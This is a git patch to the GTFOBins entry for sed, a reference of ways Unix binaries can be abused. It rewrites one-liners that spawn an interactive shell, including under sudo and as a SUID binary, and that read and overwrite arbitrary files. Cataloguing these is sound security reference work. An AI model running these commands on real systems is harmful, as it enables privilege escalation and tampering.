From 2da69686ac2b1bfaa2d5fa1191a5882616be00c7 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Wed, 13 Jun 2018 16:00:47 +0200 Subject: [PATCH] Fix sed execute and file write, also enforce standards --- _gtfobins/sed.md | 18 +++++++++++------- 1 file changed, 11 insertions(+), 7 deletions(-) diff --git a/_gtfobins/sed.md b/_gtfobins/sed.md index dbeb315..c0f2f67 100644 --- a/_gtfobins/sed.md +++ b/_gtfobins/sed.md @@ -1,19 +1,23 @@ --- functions: execute-interactive: - - code: sed "e /bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" + - description: GNU version only. Also, this requires `bash`. + code: sed -n "1e bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts + execute-non-interactive: + - description: GNU version only. + code: sed -n "1e id" /etc/hosts sudo-enabled: - - code: sudo sed "e /bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" + - description: GNU version only. Also, this requires `bash`. + code: sudo sed -n "1e /bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts suid-enabled: - - code: | - LFILE=file_to_read - ./sed -e '' "$LFILE" + - description: GNU version only. Also, this requires `bash`. + code: ./sed -n "1e /bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts file-read: - code: | LFILE=file_to_read - sed -e '' "$LFILE" + sed '' "$LFILE" file-write: - code: | LFILE=file_to_write - echo x | sed "s/x/data/;w $LFILE" + sed -n "1s/.*/data/w $LFILE" /etc/hosts ---